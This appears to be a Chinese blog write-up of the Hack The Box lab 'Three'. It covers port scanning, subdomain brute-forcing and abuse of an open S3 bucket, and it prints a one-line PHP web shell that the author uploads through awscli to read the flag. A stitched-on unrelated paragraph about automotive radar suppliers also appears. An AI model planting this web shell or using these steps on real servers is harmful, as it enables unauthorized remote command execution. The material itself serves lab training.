[StartingPoint][Tier1]Three

Task 1

How many TCP ports are open?

(打开了多少个 TCP 端口?)

sudo nmap -sS -Pn <IP> --min-rate 1000

image.png

2

Task 2

What is the domain of the email address provided in the “Contact” section of the website?

(网站“联系方式”部分中提供的电子邮件地址的域名是什么?)

image.png

thetoppers.htb

Task 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

(在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?)

/etc/hosts

Task 4

Which sub-domain is discovered during further enumeration?

(进一步枚举时发现了哪个子域?)

这里的意思,可能就是想让你将thetoppers.htb解析到靶机ip取爆破子域名

# echo "<靶机IP> thetoppers.htb">>/etc/hosts

-word.txt-
s1
s2
s3
s4
s5
admin
login

实际通过以下命令是可以爆破出子域名s3的

$ gobuster vhost -u http://thetoppers.htb -w ./word.txt -t 120

image.png

在/etc/hosts添加如下s3的子域名

image.png

s3.thetoppers.htb

Task 5

Which service is running on the discovered sub-domain?

(哪个服务正在发现的子域上运行?)

image.png

image.png

Amazon S3

Task 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

(哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互?)

awscli

Task 7

Which command is used to set up the AWS CLI installation?

(使用哪个命令来设置 AWS CLI 安装?)

安装存储库

$ ./python -m awscli configure

image.png

aws configure

Task 8

What is the command used by the above utility to list all of the S3 buckets?

(上述实用程序使用什么命令来列出所有 S3 存储桶?)

$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls

image.png

aws s3 ls

Task 9

This server is configured to run files written in what web scripting language?

(该服务器配置为运行用哪种 Web 脚本语言编写的文件?)

列出可用存储桶中的对象

$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb

image.png

php

Flag

-shell.php-
<?php eval($_GET["cmd"]);?>

$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 cp /home/martin/shell/shell.php s3://thetoppers.htb

image.png

上传文件成功

image.png

image.png

image.png

a980d99281a28d638ac68b9bf9453c2b

Question

  • 为什么攻击者配置aws configure可以直接访问桶?

目标 S3 存储桶的访问控制策略允许了对这些任意凭据的访问权限,导致攻击者可随时添加访问桶

  • 攻击路线

攻击者爆破子域名发现用的是Amazon s3存储->找到根节点s3.thetoppers.htb->攻击者创建凭据->(根节点服务端未作防护)攻击者查看,上传内容->控制服务器

  • 16
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tier 1供应商是指在汽车行业中具有领先地位的供应商,他们为众多汽车制造商提供高品质和先进技术的产品。在前雷达产品方面,有几家知名的Tier 1供应商。 首先是德尔福(Delphi)公司,他们是一家全球领先的汽车技术公司,提供多种前雷达产品。德尔福的前雷达系统具有高精度和高可靠性,能够实时探测和跟踪周围的车辆和障碍物。它们采用先进的信号处理和算法技术,能够识别车辆、行人和其他障碍物,并提供预警和自动刹车功能,确保驾驶安全。 第二家是博泉特(Bosch)公司,他们是世界上最大的汽车零部件供应商之一。博泉特的前雷达系统采用了长距离探测和宽视野范围,能够实时监测行驶中的车辆和物体,并提供警告和自动驾驶辅助功能。博泉特的前雷达系统还具有天线和传感器集成在一起的设计,减小了产品的体积和重量,提高了车辆的安全性能。 最后是卡尔森(Continental)公司,他们是一家全球知名的汽车技术供应商。卡尔森的前雷达系统利用多种先进的传感器和算法,能够实时监测和识别车辆、行人和其他障碍物。它们还具备自适应巡航控制和盲区检测功能,提高了驾驶的便利性和安全性。 总而言之,这些知名的Tier 1供应商提供的前雷达系统具有高精度、高可靠性和多功能性。它们可以实时监测和识别周围的车辆、行人和障碍物,并提供多种驾驶辅助功能,提高行车的安全性和便利性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值